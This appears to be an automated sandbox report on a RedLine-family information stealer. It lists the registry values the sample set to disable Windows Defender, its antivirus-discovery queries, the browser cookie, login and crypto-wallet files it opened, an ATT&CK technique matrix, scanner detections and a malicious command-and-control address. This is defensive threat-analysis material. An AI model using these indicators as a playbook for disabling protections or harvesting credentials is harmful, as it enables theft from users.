                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe Code function: 2_2_001F6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_001F6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe Code function: 3_2_00DE6F40 SetUnhandledExceptionFilter,3_2_00DE6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe Code function: 3_2_00DE6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00DE6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: 5_2_004123F1 SetUnhandledExceptionFilter,5_2_004123F1
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exe Code function: 0_2_00E817EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00E817EE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Code function: GetLocaleInfoA,5_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E87155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00E87155
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exeCode function: 4_2_00007FF815F0077D GetUserNameA,4_2_00007FF815F0077D
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E82BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00E82BFB

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: kGO12fD60.exe, 00000005.00000002.408292367.0000000005BD6000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000003.401568013.0000000005BD5000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.408105242.0000000005B6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kGO12fD60.exe PID: 6048, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPED
                    Source: kGO12fD60.exe, 00000005.00000002.408389160.0000000005C0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum\wallets
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: kGO12fD60.exe String found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

                    Remote Access Functionality

                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kGO12fD60.exe PID: 6048, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPED
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation
                    1
                    Windows Service
                    2
                    Bypass User Access Control
                    21
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium2
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default Accounts3
                    Native API
                    Boot or Logon Initialization Scripts1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Windows)1
                    Windows Service
                    2
                    Obfuscated Files or Information
                    Security Account Manager1
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Service Execution
                    Logon Script (Mac)1
                    Process Injection
                    21
                    Software Packing
                    NTDS137
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets361
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Bypass User Access Control
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Process Injection
                    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                    Rundll32
                    Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Behavior Graph (image not reproduced): ID: 815872, Sample: iOqzwbUlln.exe, Startdate: 27/02/2023, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label | Link
                    iOqzwbUlln.exe | 67% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine |
                    iOqzwbUlln.exe | 57% | Virustotal | | Browse
                    iOqzwbUlln.exe | 100% | Avira | HEUR/AGEN.1252166 |
                    iOqzwbUlln.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | 100% | Avira | HEUR/AGEN.1252166 |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe | 68% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | 62% | ReversingLabs | Win32.Trojan.Tedy |
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe | 54% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe | 44% | ReversingLabs | Win32.Trojan.Generic |
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe | 51% | Virustotal | | Browse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe | 59% | ReversingLabs | Win32.Trojan.Tedy |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mlf76Mf25.exe | 44% | ReversingLabs | Win32.Trojan.Generic |
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe | 62% | ReversingLabs | Win32.Trojan.Tedy |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iDa05Vg46.exe | 76% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler |
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exe | 44% | ReversingLabs | Win32.Trojan.Generic |

                    Source | Detection | Scanner | Label | Link | Download
                    3.3.sQm37qN82.exe.45a7de1.0.unpack | 100% | Avira | TR/Patched.Gen | | Download File
                    0.0.iOqzwbUlln.exe.e80000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                    2.3.stL82bL52.exe.458de20.0.unpack | 100% | Avira | TR/Patched.Gen | | Download File
                    0.2.iOqzwbUlln.exe.e80000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File
                    1.3.szV94FU13.exe.443b820.0.unpack | 100% | Avira | TR/Patched.Gen | | Download File

                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe |
                    http://tempuri.org/ | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id9 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id8 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id5 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id4 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id7 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id6 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id19Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id6Response | 0% | URL Reputation | safe |
                    https://api.ip.sb/ip | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id9Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id20 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id21 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id22 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id1Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id10 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id11 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id12 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id16Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id13 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id14 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id15 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id16 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id17 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id18 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id19 | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe |
                    http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe |
                    193.233.20.23:4123 | 9% | Virustotal | | Browse
                    http://tempuri.org/Entity/Id17Response | 0% | URL Reputation | safe |
                    193.233.20.23:4123 | 0% | Avira URL Cloud | safe |

                    No contacted domains info

                    Name | Malicious | Antivirus Detection | Reputation
                    193.233.20.23:4123 | true | 9%, Virustotal, Browse; Avira URL Cloud: safe | unknown

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sct | kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/chrome_newtab | kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://duckduckgo.com/ac/?q= | kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp | false | | high
